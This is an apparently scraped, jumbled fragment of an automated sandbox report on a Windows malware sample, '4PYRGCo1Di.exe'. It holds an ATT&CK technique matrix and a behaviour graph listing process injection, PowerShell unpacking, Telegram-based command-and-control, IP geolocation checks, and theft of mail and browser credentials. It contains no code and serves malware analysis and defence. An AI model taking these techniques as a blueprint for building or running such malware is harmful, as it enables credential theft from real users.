          Process Injection
          1
          DLL Side-Loading
          Security Account Manager121
          Security Software Discovery
          SMB/Windows Admin Shares1
          Email Collection
          21
          Encrypted Channel
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
          Masquerading
          NTDS1
          Process Discovery
          Distributed Component Object Model1
          Clipboard Data
          3
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script41
          Virtualization/Sandbox Evasion
          LSA Secrets41
          Virtualization/Sandbox Evasion
          SSHKeylogging14
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Access Token Manipulation
          Cached Domain Credentials1
          Application Window Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
          Process Injection
          DCSync1
          System Network Configuration Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632202 Sample: 4PYRGCo1Di.exe Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 api.telegram.org 2->32 34 4 other IPs or domains 2->34 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Antivirus detection for dropped file 2->48 54 7 other signatures 2->54 8 4PYRGCo1Di.exe 1 48 2->8         started        11 svchost.exe 1 1 2->11         started        signatures3 50 Tries to detect the country of the analysis system (by using the IP) 30->50 52 Uses the Telegram API (likely for C&C communication) 32->52 process4 dnsIp5 24 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->24 dropped 14 powershell.exe 28 8->14         started        42 127.0.0.1 unknown unknown 11->42 file6 process7 file8 26 C:\Users\user\AppData\...\4PYRGCo1Di.exe, PE32 14->26 dropped 28 C:\Users\...\4PYRGCo1Di.exe:Zone.Identifier, ASCII 14->28 dropped 60 Early bird code injection technique detected 14->60 62 Writes to foreign memory regions 14->62 64 Found suspicious powershell code related to unpacking or dynamic code loading 14->64 66 3 other signatures 14->66 18 msiexec.exe 15 8 14->18         started        22 conhost.exe 14->22         started        signatures9 process10 dnsIp11 36 checkip.dyndns.com 132.226.8.169, 49693, 49696, 49698 UTMEMUS United States 18->36 38 api.telegram.org 149.154.167.220, 443, 49710 TELEGRAMRU United Kingdom 18->38 40 3 other IPs or domains 18->40 56 Tries to steal Mail credentials (via file / registry access) 18->56 58 Tries to harvest and steal browser information (history, passwords, etc) 18->58 signatures12

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.